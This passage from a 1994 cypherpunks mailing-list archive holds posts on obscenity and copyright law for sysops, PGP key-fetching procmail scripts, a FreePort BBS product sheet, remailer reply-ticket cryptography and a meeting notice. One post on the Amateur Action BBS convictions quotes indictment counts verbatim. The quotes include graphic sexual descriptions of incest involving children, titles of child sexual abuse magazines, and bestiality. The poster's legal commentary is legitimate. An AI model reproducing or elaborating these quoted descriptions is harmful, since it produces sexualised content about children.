signal-to-noise ratio on those groups actually acts in the admins favor :) Additionally, all of the alt.sex.* groups are primarily text, which is almost impossible to get an obscenity conviction on. There apparently has not been a successfull obscenity conviction on text in over 20 years and films are almost as hard to get a conviction on. The real danger is in standard images, because the law requires the proof of obscenity to be based upon the artistic merit of _the work as a whole_ which makes text erotica almost completely immune and film safer than pictures. In fact, the biggest danger most sites have is not from obscenity action regarding the contents of alt.binaries.pictures.erotica.*, but from copyright action regarding the contents of those groups. To nail someone on copyright does not require them having knowledge of the copyright status of the work (ignorance is no excuse in copyright cases.) There has already been one case addressing this issue (Playboy v. Frenya [I think it was Frenya, I can't remember exactly]) and the sysop lost. You seem to have this big paranoia regarding the RR (who are actually cypherpunk allies on many issues) which I will avoid discussing, but the problem here is that you seem to think that the law in some way reflects reality. It doesn't. Pick up a copy of "Cyberspace and the Law" [Cavazos and Morin, ISBN 0-262-53123-2], read it, and then pass it on to other sysops and sysadmins so that they know how to avoid doing something stupid like the admins in the AA case. The best way to prevent something like this from happening again is to make sysops and sysadmins aware of the current law and how they can minimize thier exposure. At the conference Mike said that he was working on a listing of the various obscenity standards that he could find for communities across the nation, so admins will eventually be able to limit access to certain subjects or newsgroups based upon the location of the user. jim From perry at imsi.com Mon Dec 5 15:51:47 1994 From: perry at imsi.com (Perry E. Metzger) Date: Mon, 5 Dec 94 15:51:47 PST Subject: (Fwd) Re: GATT and RSA In-Reply-To: <199412052041.AA00620@access3.digex.net> Message-ID: <9412052350.AA06954@snark.imsi.com> Peter Wayner says: > I want to know whether GATT will affect the export of encryption > software. Doubtful. They would not have been so stupid as to back themselves into that sort of corner. .pm From wcs at anchor.ho.att.com Mon Dec 5 16:09:43 1994 From: wcs at anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204) Date: Mon, 5 Dec 94 16:09:43 PST Subject: Authentication at toad.com: WTF? Message-ID: <9412051922.AA04176@anchor.ho.att.com> Hmm, yes, using agents for security verification seems reasonable; if you've got a legal relationship or other sufficient trust. It does also require an adequate communication path between you and your agent - on the incoming side so you know that the message the agent verified is the message you're seeing (e.g. the agent's signature on the message, plus potentially some check to make sure all the messages get delivered), and on the outgoing side to make sure your agent gets your messages correctly. Bill From wcs at anchor.ho.att.com Mon Dec 5 17:00:20 1994 From: wcs at anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204) Date: Mon, 5 Dec 94 17:00:20 PST Subject: Interoperability, one-use remailer tickets Message-ID: <9412051953.AA04836@anchor.ho.att.com> Mike Ingle suggests adding a one-shot reply capability to the remailers, to discourage hit-and-run abusers by allowing replies to them. The reply token would become invalid after either one use or timeout. One problem with this approach is that, if the sender is on the mailing list / newsgroup that the message is sent to, he can use up the one-shot reply himself if he's quick, by being the first one to reply. It's also somewhat difficult to design a system where the one-shot replies would chain. Non-automatic non-mandatory one-shot replies are more useful, since there are times you may want to get replies. Bill From roy at cybrspc.mn.org Mon Dec 5 17:46:42 1994 From: roy at cybrspc.mn.org (Roy M. Silvernail) Date: Mon, 5 Dec 94 17:46:42 PST Subject: Tim May is RIGHT!!! In-Reply-To: <199412020705.XAA07308@zero.c2.org> Message-ID: <941205.180539.5I0.rusnews.w165w@cybrspc.mn.org> -----BEGIN PGP SIGNED MESSAGE----- In list.cypherpunks, nobody at c2.org writes: > I'm sorry I can't say so under my real name, but I Heh, heh... Detweiler meets McElwaine. Stop making me laugh, Larry. My lips are chapped. - -- Roy M. Silvernail -- roy at cybrspc.mn.org "I'm a family man, model citizen." -- Warren Zevon -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLuOrKxvikii9febJAQE0sgP9Hn12gC/OBpA+r2mwXQoAsmkXmfyXXf1G VqxyaCrWZHe717ZBI66bCHBIVcd0OI9pswgXzoYGYEEXFLJRh7q9dtqjGjw/Vbf0 TDu/G9mHXyfvMhL91guo0IApTB3woGhHZPhvjzTOrXWr4BcOh858lASsYEZ9U3JW Cn6IdA9B/AU= =RyCY -----END PGP SIGNATURE----- From adam at bwh.harvard.edu Mon Dec 5 18:49:21 1994 From: adam at bwh.harvard.edu (Adam Shostack) Date: Mon, 5 Dec 94 18:49:21 PST Subject: fixed code Message-ID: <199412060248.VAA04314@bwh.harvard.edu> The procmail stuff I sent yesterday was slightly broken. It seems that keyservers respond well to 'mget 36E61FB1', but not 'get 36E61FB1' To auto retrieve keys, use these two procmail recipies: # auto key retreival :0BW * -----BEGIN PGP KEYID=|/usr3/adam/bin/sender_unknown # I have an elm alias, pgp, points to a keyserver :0ac |elm -s"mget $KEYID" pgp sender_unknown #!/bin/sh # sender_unknown returns a keyid, exits 1 if the key is known OUTPUT=`pgp -f +VERBOSE=0 +batchmode -o /dev/null` echo $OUTPUT | egrep -s 'not found in file' EV=$? if [ $EV -eq 0 ]; then echo $OUTPUT | awk '{print $6}' fi exit $EV From sleas at d.umn.edu Mon Dec 5 19:42:16 1994 From: sleas at d.umn.edu (shawn leas) Date: Mon, 5 Dec 94 19:42:16 PST Subject: PGP-ELM???? Message-ID: <199412060339.VAA02118@ub.d.umn.edu> I've successfully downloaded and compiled pgp-elm, but notice no differences between it and the original. What's the deal??? How do you use it??? X-man From adam at bwh.harvard.edu Mon Dec 5 20:04:57 1994 From: adam at bwh.harvard.edu (Adam Shostack) Date: Mon, 5 Dec 94 20:04:57 PST Subject: PGP-ELM???? In-Reply-To: <199412060339.VAA02118@ub.d.umn.edu> Message-ID: <199412060403.XAA04759@bwh.harvard.edu> You wrote: | I've successfully downloaded and compiled pgp-elm, but notice no | differences between it and the original. What's the deal??? How do you | use it??? elm -p. Note that it sends the mail instantly after you sign or encrypt it. I found I prefer the 'do you want to sign' system; amongst other things, it allows you to do chaining with addition of text after each encryption, add a note outside the PGP armored file, etc. Theres a lot of read the source involved. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From skaplin at skypoint.com Mon Dec 5 20:57:43 1994 From: skaplin at skypoint.com (Samuel Kaplin) Date: Mon, 5 Dec 94 20:57:43 PST Subject: Freeport information Message-ID: -----BEGIN PGP SIGNED MESSAGE----- - -------- Forwarded message -------- Date: Mon, 5 Dec 1994 12:11:58 -0500 (EST) From: Michelle Montpetite To: skaplin at mirage.skypoint.com Subject: Freeport Here is the information you requested on Freeport software. Sincerely, Michelle Montpetite ****************************************************************************** *Michelle Montpetite E-MAIL: Michelle at Americast.com * *Account Manager PHONE : (216) 498-5100 * *American Cybercasting FAX : (216) 498-5101 * * http://www.americast.com * ****************************************************************************** FreePort Version 2.3 Product Overview Case Western Reserve University FreePort provides a simple, extensible, menu driven bulletin board system for Unix BSD systems. FreePort is designed to be used by people with little or no knowledge of computers yet still provide all of the benefits of today's powerful, computer based information systems. The more sophisticated computer users may bypass some of the basic functions of FreePort in order to streamline their access. In this way FreePort is adaptable to users of all levels of expertise. Features Accessible from any asynchronous terminal or microcomputer Except as noted here, all functions are available from any asynchronous terminal or any computer with terminal emulation software. If the user's terminal has intelligent cursor-control, FreePort supports full-screen (in addition to line) editing and cursor-based selection of menu items. Support for some devices may require editing of a configuration file. File transfers require the user to have a computer. Menu interface The menu interface presents information and FreePort functions as a hierarchy of menus. Menu selection is the user's basic navigation tool. Commonly accessed menus may be assigned aliases for direct jumping to the desired menu. Some system-wide functions, including context-sensitive on-line help are available from any menu. Your system administrator defines the individual menus and linking among menus to correspond to your view of your information. Selecting a menu item launches the menu or Unix program associated, by that menu, with that item. User Profile Access rights are configurable by user group. Anonymous users have read-only access (e.g. they cannot post to the bulletin boards nor send e-mail); registered users have full normal access; and authorized bulletin-board operators have additional privileges to manage the portions of the information hierarchy delegated to them. Additional privileges may be defined by your system administrator. Each registered user has an electronic mail address and mailbox, a modifiable user profile, and a disk work area. Portions of the profile (e.g. name, e-mail address, and interest keywords) are searchable by other FreePort users. The work area is for temporary storage of files saved from the bulletin board, mail, and file transfer systems. Electronic Mail Users may send (and receive) electronic mail to other FreePort users. If the system is connected to a TCP/IP network, electronic mail extends to any user at host reachable through that network. Mail is received into the user's private mailbox. Users may browse the mailbox at their leisure --searching for or selecting messages to read, search, save, delete, or forward. Messages may be composed using one of the built-in text editors or uploaded from the user's computer. Bulletin Boards A bulletin board is much like a public mailbox. It is often used to implement a discussion group as well as the electronic equivalent of the traditional corkboard. Every user may read and save a copy of, but not modify, existing messages on the bulletin board. Users may post their own messages through an e-mail-like interface. On an open bulletin board, posted messages immediately appear for reading by all. On a moderated board, posted messages are first filtered by a human moderator who may post to the actual bulletin board. For each user, the system remembers which messages on each bulletin board he has read (or marked as read). Multi-user Chat Users may interactively chat with others on chat areas analogous to CB radio channels. The chat system moderates and distributes the contributions of each to the others on the channel. Voting Authorized users may post issues for voting by the user community. An issue posting defines the issue text to be presented to users, and the predefined and/or free formatted answers allowed. Users may go to the voting area, select an issue, and vote through a bulletin board like interface. The system maintains running tallies which may optionally be displayed. File transfer A user may send files to other FreePort users, upload/download files to his computer using the Kermit or {XYZ}Modem serial line protocols, and transfer files to/from systems on a TCP/IP network using FTP. Gateway to other systems on a network If the FreePort system is on a TCP/IP network, "padded cell" versions of Telnet and ftp provide user connections to external administrator-selected service systems (including other FreePorts) on that network. Miscellaneous Other features include a text file viewer, a simple database system, system usage logging, an automated address taker, session time limits, and a function to get a list of on-line users. Interoperable with other systems FreePort is designed for maximum interoperability with other internet information resources. It utilizes popular publicly available layered products to implement the underlying communications services. Thus it is compatible today and will interoperate as these layered products evolve to use new standards. The layered products and standards include: * The Berkeley Unix sendmail, or compatible * C-News bulletin board service and various library routines written at the University of Toronto * Internet Relay Chat server written at University of Oulu (Finland) and client written at Boston University * Kermit serial file transfer service written at Columbia University * Telnet, ftp and various library routines written at the University of California FreePort is configured to run on a single computer system containing the above layered products. Installation by knowledgeable Unix Systems Programmers in a distributed computing services environment of multiple computer systems is possible, though not supported. Extensible The programs provided give you the tools needed to set up and run a simple bulletin board system. Without modifying any source code or recompiling any programs, you can expand the BBS as far as your imagination (and system resources) permit. The BBS software uses Ascii files and any available Unix programs to build a system that you can modify and expand. Menus can be updated and new sections added to the running system without interrupting service. System Prerequisites Hardware Prerequisites User access ports You must provide some way for your users to access the system. FreePort will work with any method (e.g. modems, serial lines, and remote login) which establishes a login session to your FreePort service system. Network connection (optional) If your FreePort system is connected to a TCP/IP network, you may participate with other information services on that network. Examples include: e-mail, file transfer, other FreePort systems, Usenet bulletin boards, remote data feeds, and remote login. Disk space You will need disk for your host Unix operating system and utilities, program maintenance, electronic mail queues, bulletin boards, user mailboxes and work areas, and the information files that you make available to your users. Disk space requirements are dominated by the data that you wish to keep on-line. * Installation and maintenance of FreePort and its prerequisite programs requires about 60MB. * Mail queue and bulletin board space depend on your anticipated e-mail traffic and the amount of information that you wish to retain in bulletinboards. Cleveland Free-Net runs the FreePort software and currently retains about 1000MB of bulletin boards alone. * Mailboxes and user work areas are quota controlled. You might use 100KB per user for an initial estimate. Performance FreePort runs on workstation or larger Unix systems. Performance of your system depends on the type of information services that you provide and on the nature of your clients' use of the system. We have found the following configurations to be satisfactory for the CWRU and Cleveland Free-Net user communities. IBM RT/115 with 8MB memory serving 10 simultaneous users IBM RT/135 with 16MB memory serving 24 simultaneous users Software Prerequisites Operating system FreePort is dependent on Unix BSD 4.3 features. It does not currently run on System 5 R3, AIX, or compatible systems. Operating systems that FreePort is known to run under include SunOS 3.5 or newer, DEC Ultrix 3.0, and IBM/4.3. Prerequisite software FreePort is distributed in source code. You will need typical Unix program development tools including an C compiler, yacc, and linker. The publicly available layered software mentioned above is available from various ftp sites on the internet, or is available from CWRU as a complete collection of the prerequisite source code. Support staff Depending on the size of your planned system, support staffing may vary from one to several full-time staff. Most of the effort in operating FreePort goes to the management of information sources and users. Staff functions include technical support, operations, administration, and user support. Installation and maintenance of the FreePort software requires an experienced Unix Systems Programmer. The technical support person requires 'root' access to install and configure the various prerequisite communications software. The system runs with little or no operator intervention. The major operations duty is filesystem backups. System administration duties include architecting the menu hierarchy, installing new menus, authorizing new Sysops and adding users, coordinating Sysops, and arbitrating usage conflicts. The Cleveland Free-Net, for example, has over 400 volunteer Sysops who each husband a delegated information area in the system. More Information Try it out. If you would like to see what FreePort can do, you may connect to the Cleveland Free-Net any time of the day or night. The Cleveland Free-Net is running FreePort plus some experimental extensions which may appear in a future release. The modem pool phone number is (216)368-3888. If you have internet access, you may telnet to one of the following addresses (the IP addresses may change without notice): node name IP address freenet-in-a.cwru.edu 129.22.8.82 freenet-in-b.cwru.edu 129.22.8.75 freenet-in-c.cwru.edu 129.22.8.76 The system will invite you to become a register user. You may "explore the system" as a visitor, or you may apply to be a registered user so that you can send mail, post messages and participate in the chat areas. Licensing A 5-year renewable FreePort 2.3 license for a nonprofit site is $850 ($2800 for-profit). The software is shipped as a "tar" file on 8mm Exabyte cartridge, or for extra cost, on 1/2" magnetic tape or DC6150 cartridge. The software is AS IS. Additional consulting services are available, as needed, from the American Cybercasting Corporation (separate Fee Required). For the license agreement and other information contact: American Cybercasting Corporation P.O. Box 575 Aurora, Ohio 44202 Phone: (216) 247-0770 FAX: (216)247-0778 Internet: USA at AmeriCast.Com Unix is a trademark of AT&T ### ============================================================================== There is only one honest impulse at the bottom of Puritanical religion, and that is the impulse to punish the man with a superior capacity for happiness. --H. L. Mencken-- ============================================================================== skaplin at skypoint.com | "...vidi vici veni" - Overheard | outside a Roman brothel. PGP encrypted mail is accepted and | preferred. | Change is the only constant in the | Universe..."Four quarters, please." E-mail key at four11.com for PGP Key or | Finger skaplin at mirage.skypoint.com | Smile!! Big brother is watching. ============================================================================== -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBLuPt88lnXxBRSgfNAQHENAf6A4xtufivzZZ3a3+RXNudDOQYoDSuZTN4 ctffGV0f0j/0Iy+YONixLHKT8z1KyaxeJkA1l8Ed0oFFA+PP5+Pr1jSkgt71+VYQ J8/ASYI/Msp0RMjU+E79zHQLWD/o8YCkyQGRywHGc2ZJwfzLEQdQ9A93JLB8hRMM uu5e6pfBF+LqlAQvYDuN310z8+OZ2KvARdS2pklzI2ZZvFhxIcoSxHKglqLo/EvA Ug1oEyAraHrcEosoAAzlHY5LNRhK2ZlmahEglmIFGkSGpYDA/FbpB+O4i3r0JT4R m45YMVg2IRiA+Wqla3Gzkb/baAAEdrXVhK7U+XnVwrz21vGFDrgKOw== =ve5i -----END PGP SIGNATURE----- This message digitally signed to verify the identity of the writer. From edkelly at INS.INFONET.NET Mon Dec 5 21:12:59 1994 From: edkelly at INS.INFONET.NET (ED KELLY) Date: Mon, 5 Dec 94 21:12:59 PST Subject: AABBS Conviction relation to child porn? Message-ID: <0098881E.4950521B.51@INS.INFONET.NET> There is hoopla over the convictions of those who ran the Amateur Action BBS. The actual charges involve stuff that sounded like it was intended to be distributed as child pornography. The indictment described the offensive material being destributed as follows in each count: COUNT 1: CONSPIRACY TO VIOLATE FEDERAL OBSCENITY LAWS BY DISTRIBUTING OBSCENE MATERIALS (see following) -------------------------- COUNT 2: "AA-8589.GIF" described as "SHE SUCKS HER SON'S COCK! FATHER IS FUCKING HIS DAUGHTER !" -------------------------- COUNT 3: "AA-8278.GIF" described as "FULL SCREEN VIEW! A HAIRLESS PUSSY NAILED TO A TABLE!", "AA-7153.GIF" described as "MOTHER IS WATCHING HER DAUGHTER FUCK BIG COCK! NO TITS!", "AA-8682.GIF" described as "HE MAKES HIS DAUGHTER SUCK COCK! SHE IS FISTING HER SISTER!", and "AA-11935.GIF" described as "HE FUCKS HIS DAUGHTERS HAIRLESS CUNT!" SHE FISTS HER MOTHER!" -------------------------- COUNT 4: "AA-15198.GIF" described as "BLONDE LOLITA HAS NO TITS! SUCKS HUGE COCK AND DRINKS SPERM!" ------------------------- COUNT 5: "AA-13216.GIF" described as "PUSSY PENETRATION! HORNY BRUNETTE GETS FUCKED BY A HORSE!" ------------------------- COUNT 6: "AA-13517.GIF" described as "HORNY BLONDE JACKS OFF HORSE! HORSE CUM ON HER HANDS!"', "'AA-13521.GIF" described as "CLOSE-UP! BIG HORSE COCK IN HER CUNT! HORSE CUM ON HER LEG", and "AA-16587.GIF" described as "'SHE SUCKS THICK DOG COCK! DOG SPERM ON HER LIPS AND CHIN." -------------------------- COUNT 7: "AA-17623.GIF" described as "YOUNG ASIAN HAS A THICK CLIT! DRINKS PISS FROM AN UNCUT COCK!" -------------------------- COUNT 8: . . . used an express company and common carrier, United Parcel Service (UPS), for carriage in interstate commerce from California to Tennessee an obscene video cassette tape -------------------------- COUNT 9: . . . used an express company and common carrier, United Parcel Service (UPS), for carriage in interstate commerce from California to Tennessee obscene video cassette tapes -------------------------- COUNT 10: . . . used an express company and common carrier, United Parcel Service (UPS), for carriage in interstate commerce from California to Tennessee obscene video cassette tapes -------------------------- COUNT 11: . . . shipped in interstate commerce by means of the United States Mail, visual depictions, the production of which involved the use of a minor engaging in sexually explicit conduct, . . . involving (three (3) magazines, bearing titles of "Little Girls Fuck Too!", "Lolita Colour Special 6" and "Lolita Color Special 18" -------------------------- COUNT 12: FORFEITURE ALLEGATIONS involving any instrumentalities of committing crimes. The Grand Jury voted to charge the defendants with all of the above crimes. The trial jury, did not convict the defendant of the one count charging child pornography -- perhaps because it was never proved that the defendants opened it (see Count 11). Although the convictions of the defendants in the Amateur Action BBS case were not technically for violation of federal child pornography laws, if the defendant's own descriptions of their wares is correct, I think the jury might have convicted them because of the apparant inclusion of children in their materials. People do not need to feel bad about convictions of those who peddle depictions showing children in sex acts. Reasonable people may disagree about important issues. But, I do not feel protected speech or electronic communication was endangered by the defendants' shipment and sale of their described materials. ED KELLY From hfinney at shell.portal.com Mon Dec 5 21:42:32 1994 From: hfinney at shell.portal.com (Hal) Date: Mon, 5 Dec 94 21:42:32 PST Subject: Interoperability, one-use remailer tickets In-Reply-To: <01HK8FKNB3LE90PJWN@delphi.com> Message-ID: <199412060542.VAA11700@jobe.shell.portal.com> Mike Ingle writes some very nice ideas about remailers: >The remailers need a one-time reply mechanism. >This would enable many other things, including "persistent" anonymous >entities, without using broadcast techniques. The current remailers >encourage hit-and-run anonymity, like the recent burst of anonymous >nastiness, and discourage conversational anonymity and persistent >anonymous entities. Sending a one-way message is easy and fairly secure. Bill Stewart pointed out some of the problems with one-shot reply addresses, although he seemed to be analyzing them as features which the remailers provided against the users's will. I think Mike's idea was that this is something which remailer users would like. Still, Bill's comments seem valid. How useful is a single-use reply address? If you posted a message to a mailing list or newsgroup only the first person would get through to you. You could post a message with a list of reply addresses but that would open up some traffic analysis problems. Two people having a conversation fits this model somewhat well, with each person sending a new reply address that can reach them with each message. But even in this case how often is there a strict alternation of messages? Perhaps a "one ahead" approach would work, where each person at all times has either one or two addresses which will get through to the other side as long as they are in "alternation mode". Then when one person needs to get a message to the other out of turn, he uses up his spare address. Then he gets sent two new addresses in the reply message since now he has none, and they are back in the initial state. >One way to do this: each remailer has a list of secret (symmetric) keys. >Each secret may have an expiration date. By some method (problem discussed >later) the user and the remailer establish a shared secret, adding it to the >list, while the remailer does not find out who the user is. The reply ticket >contains a series of nested hops, each encrypted with that remailer's secret >plus all the others after it. >When the ticket is used, the remailer decrypts one layer of the ticket to >obtain the next hop. It then encrypts the message with that secret key. Now >it forgets the secret key (poof!) and passes the message and remainder of >the ticket on to the next remailer. >The ticket is getting decrypted at each hop, and the message is getting >encrypted. Thus there is nothing recognizable between hops, and the trail is >burning up as the message propagates. At the terminal end, the recipient >applies all of the secret keys in the proper order to decrypt the message. >Of course, an additional end-to-end public-key encryption is also an option. As you have seen, this model is very similar to Chaum's 1981 paper except for where the secret keys come from. This is not to disparage your ideas but it's just that as long as we have giants around, we might as well stand on their shoulders. Chaum's system was considerably simpler as it used ordinary PK decryption of the address at each stage, with the header including a secret key that would encrypt the body to maintain unlinkability. As you point out this has a certain kind of vulnerability to coercion that your scheme is less sensitive to. >The catch: how do we establish a shared secret with the remailer, without >identifying ourselves to it? If the first remailer (the one the replyer >sends the ticket to) is corrupt, and it knows who established the secret >contained in the ticket, it knows the end-to-end path of the message. >Solution 1: each remailer has a public key. To establish shared secrets with >a series of remailers, you send a normally-chained and nested message, using >each remailer's public key. Each remailer decrypts a layer, stores the >secret contained for it, and passes the message on. The first few remailers >may not get secrets; they are just there to anonymize the message. > Problem: secret-establishing message is replayed, setting trail back up, > then reply ticket is replayed. Solution: when a secret is used, it is > one-way hashed, the hash stored, the secret forgotten. Secrets which have > already been used will not be accepted the second time. When the used > secrets list gets full, a new public/secret pair is generated and the old > one is forgotten, preventing any more replays. Chaum too used a list of message hashes, although his use was to prevent the reply-replay attack. I will note that this attack is going to be pretty difficult to mount on your scheme as it would require either saving all messages from a suspected target of an anonymous address, or saving all messages into the remailer network in toto, then perhaps playing (all of?) them back. So it is not going to be easy to set up this chain again. In addition to your idea of hashes you could use some time limits to restrict this kind of reply attack. > Problem: remailers are coerced or hacked to decrypt a captured secret- > establishing message, before the secret key is expired. Trail of a reply > ticket can then be followed. Solution: no good one that I can think of. Yes, this is the kind of coercion that as you point out the Chaum scheme is vulnerable to. There we rely on the remailers to not send two messages to the same one-shot address in order to prevent replay attacks. But as long as the remailer key is valid there is the chance that the remailer could be coerced and forced to decrypt your anonymous address, allowing it to be traced back to you. I do think that your scheme is less sensitive to this kind of coercion because of the difficulty of knowing which message to ask the remailer to decrypt. Ironically, your scheme is even stronger than "forward" messages throught the remailer network. Those are equally vulnerable to this kind of coercion. If a suspect sends a message through the remailer network, it can be replayed in just the way that we are worried about for Chaum replies, and the remailers coerced into decrypting it at each step. We tend not to worry so much about this forward vulnerability as we do about the reverse one. Partially this is because our current remailers don't implement Chaum's scheme, but partially too we sense that an interesting public pseudonym is a more inviting target than the hopefully anonymous true name behind it. I'm not really sure how good an assumption this is, though. So I am less inclined to view Chaum's scheme as broken since the remailer network inherently suffers the same vulnerabilities. We hope to develop enough independent remailers that the coercion issue will not be a major problem. Tim May has advocated hardware, tamper-proof circuits to hold the keys so that coercion is impossible. Plus, I think an important part of the picture which is not currently being implemented is remailer key changes. This can provide forward secrecy similar to your scheme. Once last week's key is gone, there is no longer any danger of your message ever being traced (as long as you trust the remailer to truly erase it, just as in your scheme). This would be useful both for ordinary remailing and for Chaum-style reply blocks, which as I say are both vulnerable to the reply-with-coercion attack. There is one attack on all these schemes which you didn't mention, which is that the bad guys are the first one to try the return address and coerce each remailer along the way. This might be especially dangerous in the case of your "pigeonhole" described below, where the pigeonhole account makes for a tempting target for the snoopers, giving them a chance to intercept the reply message back to you and be the first ones to be using it. >Solution 2: establish a shared secret by a simple, direct Diffie-Hellman >exchange with the remailer. You send a public-piece in a message, remailer >sends you a public-piece, both sides compute the secret. If the remailer is >corrupt, it now knows who you are. This is a level-1 secret. >Use the level-1 secret as a reply ticket to establish a secret with another >remailer. Message goes through a remailer, to the target you want to >establish a secret with. Target replies using the level-1 secret. This is a >level-2 secret; two remailers have to be corrupt to trace this secret to >you. If you want, use the level-2 secret for another exchange to create a >level-3 secret, and so on until your comfort zone is reached. An automatic >program sits around stockpiling secrets for you. Problem: high bandwidth. >Does anyone know of a better way to establish a shared secret in an >untraceable way? Both of these methods have their problems. That is a very nice idea for using DH. Here is a variant which might use less bandwidth. Have each remailer create a lot of DH key halves, values of hi = g^xi so xi is the secret discrete log of the public DH key half hi. All these hi get published. Now you need to reserve one for yourself to use in your return ticket, which you do perhaps with an ordinary remailed message to that remailer as in your first solution. You create a random y and use hi^y for your secret key for that remailer. The reply block contains i and g^y which lets the remailer calculate the same secret. Then it deletes xi when it gets used so you get the forward secrecy you desire. This is not subject to the reply attack you were worried about because all you told the remailer was i, and xi is gone for good so they can't re-create the secret. (Equivalently, have the remailers create lots of public keys and publicize them, and reserve one in the same way. Then have the remailer erase the secret key when it gets used. This is just another way of describing the above.) >Given a secure two-way messaging mechanism, persistent anonymous identities >are established using a "pigeonhole service". This is a service, with a >publicized address, that will accept public-key encrypted mail and store it >in a "pigeonhole". The owner of the pigeonhole anonymously sends a request >(with authentication) and a reply ticket. The pigeonhole service sends the >owner his mail using the ticket. This is a good idea, although there is a tradeoff between frequent polls of the pigeonhole, which might allow some traffic analysis particularly if there is a suspected link between persona and true name, and less frequent checks, which may cause high priority messages to be delayed. >Anonymous users would need a client that could set up trails, create >tickets, request mail from the pigeonhole, etc. One nice feature of the >system is that non-anonymous users could talk to anonymous users without >having a client. The anonymous message would be of the form: >--- BEGIN REPLY TICKET (LEAVE AT HEAD OF REPLY) --- >(Reply ticket ciphertext) >--- END REPLY TICKET --- >Message text >The non-anonymous user could reply with any mail reader, send the message >back to the remailer that sent it to him, and the message would be >transported securely back to the anonymous user that sent it. Yes, well, we do this already with our current remailers. Many people have written clients to create these reply blocks, along with little instructions to the baffled recipient to cut and past the reply block at the front of the reply message. Once in a while these even work, I think. With your pigeonhole idea you don't need this, you can just have a Reply-To that points at the pigeonhole, which is one of its biggest advantages. >For reliability in a large remailer network, end-to-end reliability is >better than point-to-point reliability. Messages should be m-of-n secret >shared before transmission, and reassembled at the terminal end. For >clientless reception, the terminal node remailer could do the reassembly >and splitting of replies. I agree with this. This also relates to issue of message size quantization with cryptographically strong padding. I don't suppose the RSAREF library could do that... >Code for secret sharing is available, but most secret-sharing algorithms >create shadows each the size of the message. This can be avoided: use an >error correcting code to add enough information to the original so the >message can be recreated with any m of n pieces. Break into pieces, encrypt >each piece, and secret-share the key. Yes, this is a good idea. I first read about this in the 1993 Crypto conference proceedings, in a paper called "Secret Sharing Made Short" by Hugo Krawczyk. You might find the paper useful although it sounds very similar to what you have in mind already. Considering all the pros and cons, I am afraid that even the security of the one-shot return address is probably insufficient, especially when the simple "post replies to usenet encrypted with this key" is so easy and safe. Granted it will be a problem once everybody starts doing that, but flooding is going to be hard to beat for safety. Hal From ktk at syzygy.com Mon Dec 5 22:26:25 1994 From: ktk at syzygy.com (KT Kislitzin) Date: Mon, 5 Dec 94 22:26:25 PST Subject: Dec. 10th Bay Area Cypherpunks Meeting Message-ID: <199412060628.WAA07448@syzygy.com> ANNOUNCEMENT ============ This month's Bay Area Cypherpunks Meeting will be held this Saturday, December 10th, from 12 noon until 6 pm in Silicon Graphics Cafe Iris (same cypher time, same cypher channel...). The topic for this month's discussions is: Technical Cryptography We have three speakers planned. Susan Langford will speak on Cryptanalysis of DES and Other Block Cyphers. She will be speaking generally on the subject, and will discuss her work on Differential Linear Cryptanalysis of DES. Susan is working with Martin Hellman at Stanford University. Raph Levien will present ``The Security of Cypher Block Chaining'', a paper from Crypto '94 by Mihir Bellare, Joe Kilian, and Phillip Rogaway. Raph is working to infect all mail user agents with PGP. Eric Hughes will present ``Towards the Equivalence of Breaking the Diffie-Hellman Protocol and Computing Discrete Logarithms'', a paper from Crypto '94 by Ueli M. Maurer. Eric has been active in the Cypherpunks movement for several years now. Additional speakers are of course welcome. Discussions of implementations of crypto systems are welcome also. Please contact me (ktk at sgi.com or ktk at syzygy.com) asap if you are interested in speaking. Presentations need not be long. Suggestions for dinner are welcome. ----------------------------------------------------------------------------- DIRECTIONS: Silicon Graphics, Inc. Building 5 (SGI Cafeteria) 2025 North Shoreline Boulevard Mountain View, CA >From 101 take Shoreline East. This is towards Shoreline Amphitheatre. It's also "logical east", and points more north that east. (That is, it's east with respect to 101 North, which points west near the exit.) If you're coming in on 101 South, you'll cross over the bridge. Continue on Shoreline and go past a whole bunch of other SGI buildings. Turn right onto Steirlin Court at the big red metal sculpture. There will be even more SGI buildings surrounding you--take note of the building numbers. Go almost to the end of this street. Building 5 is on the right. From tjb at acpub.duke.edu Mon Dec 5 22:46:02 1994 From: tjb at acpub.duke.edu (Tom Bryce) Date: Mon, 5 Dec 94 22:46:02 PST Subject: Are there *any* internet services runnable from powerpc Message-ID: <199412060645.BAA07462@acpub.duke.edu> I'm still thinking I'd like to provide some internet services from my power mac. I have my own IP address and the folks at network services said they don't mind if I run a WWW server, and they will even change the name assigned to my IP address if I don't like it. So it sounds to me like I can provide internet services. I hesitate to run a web server because I hear there are lots of security bugs and I won't subject my mac to that. I am looking for a unix emulator that is freeware for the macintosh. I was directed to one apparently freeware unix platform for the mac by someone on the cypherpunks list, but it says it does not support ethernet which is how I am interfaced. I have a power mac 7100 with an ethernet port to the internet. Does anyone know if I could, for example, get scripts for Eudora to snarf mail and run a keyserver, or set up an anon remailer, or do anything at all remotely cool and for the betterment of the crypto/privacy/pgp/etc. services available to the internet public? I could leave my mac on 24/7 serving up services. When I'm debugging code it might crash, but I suppose there should be fail-safe systems. It doesn't seem like I can do much unless I buy a unix emulator, and I don't have the money for that. I'm a student. Tom ------------------------------------------------------------------------ Tom Bryce for PGP public key finger tjbryce at amherst.edu From cactus at hks.net Mon Dec 5 23:40:19 1994 From: cactus at hks.net (L. Todd Masco) Date: Mon, 5 Dec 94 23:40:19 PST Subject: MMB question Message-ID: <199412060745.CAA07323@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- Schneir mentions MMB in the section following IDEA (in 11.10) of _Applied_ _Cryptography_, but notes that it's brand-spanking new at the time of _AC_'s publication. He mentions that "Eli Biham thinks that a 128-bit block size actually weakens the algorithm." What's the current thought on MMB? Has it undergone serious analysis and if so, what's the conclusion been? Thanks, - -- Todd Masco | "Roam home to a dome, Where Georgian and Gothic once stood cactus at hks.net | Now chemical bonds alone guard our blond(e)s, cactus at bb.com | And even the plumbing looks good." - B Fuller - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuQWbSoZzwIn1bdtAQH14wGAiDedhz9smWvZ4Taph8ITrMJq+Ey+J/MT 3TXoYa+j3YAbh2OU6l0Lc/M+uQy1vVBP =Ejvv -----END PGP SIGNATURE----- From cactus at 